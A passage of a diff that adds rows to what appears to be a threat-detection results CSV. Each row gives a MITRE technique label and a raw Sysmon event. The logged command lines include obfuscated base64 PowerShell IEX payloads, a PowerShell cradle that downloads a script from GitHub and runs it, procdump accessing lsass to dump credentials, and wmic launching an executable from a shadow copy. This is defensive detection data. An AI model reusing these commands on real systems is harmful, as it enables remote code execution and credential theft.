+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-47BB-5CE3-0000-0010BFA83E00</Data>
+    <Data Name=""ParentProcessId"">1912</Data>
+    <Data Name=""ParentImage"">C:\Users\IEUser\Downloads\com-hijack.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Users\IEUser\Downloads\com-hijack.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1553028075.154291,2019-03-20T00:41:15.154291+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T20:41:15.144276Z"">
+    </TimeCreated>
+    <EventRecordID>1966252</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1564"" ThreadID=""1252"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-19 20:36:04.226</Data>
+    <Data Name=""ProcessGuid"">365ABB72-52B4-5C91-0000-0010D55B0100</Data>
+    <Data Name=""ProcessId"">1636</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-528D-5C91-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-528D-5C91-0000-001062560000</Data>
+    <Data Name=""ParentProcessId"">484</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1003] Credential Dumping - Process Access,1552849783.932612,2019-03-17T23:09:43.932612+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>10</EventID>
+    <Version>3</Version>
+    <Level>4</Level>
+    <Task>10</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-17T19:09:41.328868Z"">
+    </TimeCreated>
+    <EventRecordID>4434</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""344"" ThreadID=""2032"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC04.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-17 19:09:41.328</Data>
+    <Data Name=""SourceProcessGUID"">365ABB72-9B75-5C8E-0000-0010013F1200</Data>
+    <Data Name=""SourceProcessId"">1856</Data>
+    <Data Name=""SourceThreadId"">980</Data>
+    <Data Name=""SourceImage"">C:\Users\IEUser\Desktop\procdump.exe</Data>
+    <Data Name=""TargetProcessGUID"">365ABB72-0886-5C8F-0000-001030560000</Data>
+    <Data Name=""TargetProcessId"">476</Data>
+    <Data Name=""TargetImage"">C:\Windows\system32\lsass.exe</Data>
+    <Data Name=""GrantedAccess"">0x1fffff</Data>
+    <Data Name=""CallTrace"">C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\SYSTEM32\ntdll.dll+1d4da|C:\Windows\system32\kernel32.dll+3cc47|C:\Windows\system32\kernel32.dll+3ff99|C:\Windows\system32\dbghelp.dll+4c791|C:\Windows\system32\dbghelp.dll+4dcab|C:\Windows\system32\dbghelp.dll+4a1b8|C:\Windows\system32\dbghelp.dll+45b81|C:\Windows\system32\dbghelp.dll+45e2a|C:\Users\IEUser\Desktop\procdump.exe+11a8d|C:\Users\IEUser\Desktop\procdump.exe+116a6|C:\Users\IEUser\Desktop\procdump.exe+11610|C:\Users\IEUser\Desktop\procdump.exe+11356|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d</Data>
+  </EventData>
+</Event>",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
+[ T1059 ] wscript or cscript runing script,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (&quot;c:\windows\system32\wscript.exe&quot; /E:vbs c:\windows\temp\icon.ico &quot;powershell -exec bypass -c &quot;&quot;IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(&apos;JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp&apos;)))&quot;&quot;&quot;) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (&quot;C:\Windows\system32\rundll32.exe&quot; zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-14T12:17:14.893930Z"">
+    </TimeCreated>
+    <EventRecordID>10675</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2004"" ThreadID=""4480"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-14 12:17:14.661</Data>
+    <Data Name=""ProcessGuid"">747F3D96-FBCA-5D53-0000-001036784100</Data>
+    <Data Name=""ProcessId"">2876</Data>
+    <Data Name=""Image"">C:\Windows\System32\wscript.exe</Data>
+    <Data Name=""FileVersion"">5.812.10240.16384</Data>
+    <Data Name=""Description"">Microsoft ® Windows Based Script Host</Data>
+    <Data Name=""Product"">Microsoft ® Windows Script Host</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;c:\windows\system32\wscript.exe&quot; /E:vbs c:\windows\temp\icon.ico &quot;powershell -exec bypass -c &quot;&quot;IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(&apos;JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp&apos;)))&quot;&quot;&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-F419-5D53-0000-002026910200</Data>
+    <Data Name=""LogonId"">0x29126</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-FBCA-5D53-0000-0010B8664100</Data>
+    <Data Name=""ParentProcessId"">2476</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920557.811477,2019-05-27T05:29:17.811477+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:17.811477Z"">
+    </TimeCreated>
+    <EventRecordID>5901</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:17.771</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-00100478FF00</Data>
+    <Data Name=""ProcessId"">3444</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool /text:processmodel.username</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1558969974.632117,2019-05-27T19:12:54.632117+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe  process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T15:12:54.544664Z"">
+    </TimeCreated>
+    <EventRecordID>6190</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""980"" ThreadID=""2220"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 15:12:54.515</Data>
+    <Data Name=""ProcessGuid"">365ABB72-FE76-5CEB-0000-001077710C00</Data>
+    <Data Name=""ProcessId"">2840</Data>
+    <Data Name=""Image"">C:\Windows\System32\wbem\WMIC.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">WMI Commandline Utility</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\wbem\wmic.exe  process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-FE76-5CEB-0000-0010546E0C00</Data>
+    <Data Name=""ParentProcessId"">2356</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T1086 ]  Powershell with Suspicious Argument,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (|, -c ,.Download,.DownloadFile(,Net.WebClient,powershell,.txt,|, -c ,.Download,.DownloadFile(,Net.WebClient,powershell,.txt) in event with Command Line (powershell  -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd  /c powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:23.507565Z"">
+    </TimeCreated>
+    <EventRecordID>4912</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:23.380</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6623-5D3F-0000-0010BC068800</Data>
+    <Data Name=""ProcessId"">3000</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">powershell  -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6623-5D3F-0000-001011F68700</Data>
+    <Data Name=""ParentProcessId"">5816</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1202] Indirect Command Execution,1557680511.00795,2019-05-12T21:01:51.007950+04:00,,Threat,Medium,Found User (IEWIN7\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( &quot;C:\Windows\System32\pcalua.exe&quot;  -a c:\Windows\system32\calc.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T17:01:50.781015Z"">
+    </TimeCreated>
+    <EventRecordID>16497</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2012"" ThreadID=""300"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 17:01:50.781</Data>
+    <Data Name=""ProcessGuid"">365ABB72-517E-5CD8-0000-001024D61700</Data>
+    <Data Name=""ProcessId"">2952</Data>
+    <Data Name=""Image"">C:\Windows\System32\pcalua.exe</Data>
